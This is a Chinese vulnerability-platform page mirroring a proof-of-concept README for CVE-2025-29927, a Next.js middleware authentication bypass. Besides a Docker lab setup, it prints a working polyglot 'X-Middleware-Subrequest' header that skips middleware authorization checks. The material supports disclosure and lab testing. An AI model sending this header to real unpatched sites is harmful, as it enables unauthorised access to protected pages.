漏洞平台

POC详情： 5d5f706c100ca6cde8582ed03a7f15d78aca7826

来源

https://github.com/alihussainzada/CVE-2025-29927-PoC

关联漏洞

标题： Next.js 安全漏洞 (CVE-2025-29927)
描述：Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞，该漏洞源于如果授权检查发生在中间件中，可能绕过授权检查。

描述

PoC for CVE-2025-29927: Next.js Middleware Bypass Vulnerability. Demonstrates how x-middleware-subrequest can bypass authentication checks. Includes Docker setup for testing.

介绍


# CVE-2025-29927: Next.js Middleware Bypass Vulnerability PoC

This repository demonstrates the CVE-2025-29927 vulnerability in Next.js, where the internal header `x-middleware-subrequest` can be used to bypass middleware checks like authentication.

## Affected Versions

  - Next.js 15.x < 15.2.3
  - Next.js 14.x < 14.2.25
  - Next.js 13.x < 13.5.9

## Steps to Reproduce

### 1. Clone the Repository:
```bash
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
```
### 2. Navigate to the Project Folder:
```bash
cd CVE-2025-29927-PoC
```
### 3. Generate a Secret:
```bash
openssl rand -base64 32
```
### 4. Update the Secret in the `.env` File:
```
NEXTAUTH_SECRET=your_generated_secret
```
### 5. Build and Run with Docker:
```bash
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
```

## Proof of Concept
We can greatly simplify the exploitation of this issue by using a polyglot that lets us effectively cover the various potential cases. We were able to achieve this with the following HTTP header, used to check for the presence of an authentication bypass:
```
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```
![Redirect users](1.png)

![Exploitation Example](2.png)

## Credits/Sources

- [Next.js Blog on CVE-2025-29927](https://nextjs.org/blog/cve-2025-29927)
- [Zhero Web Security Research: Next.js and the Corrupt Middleware](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
- [Assetnote Security Research: Analyzing the Next.js Middleware Bypass](https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/)

文件快照


 [4.0K]  /data/pocs/5d5f706c100ca6cde8582ed03a7f15d78aca7826
├── [ 67K]  1.png
├── [149K]  2.png
├── [ 419]  Dockerfile
├── [ 963]  middleware.js
├── [ 350]  package.json
├── [4.0K]  pages
│   ├── [4.0K]  api
│   │   └── [4.0K]  auth
│   │       └── [1.7K]  [...nextauth].js
│   ├── [ 283]  _app.js
│   ├── [4.0K]  auth
│   │   └── [3.2K]  signin.js
│   ├── [1013]  dashboard.js
│   └── [ 664]  index.js
├── [1.8K]  README.md
└── [4.0K]  styles
    └── [ 225]  globals.css

5 directories, 12 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。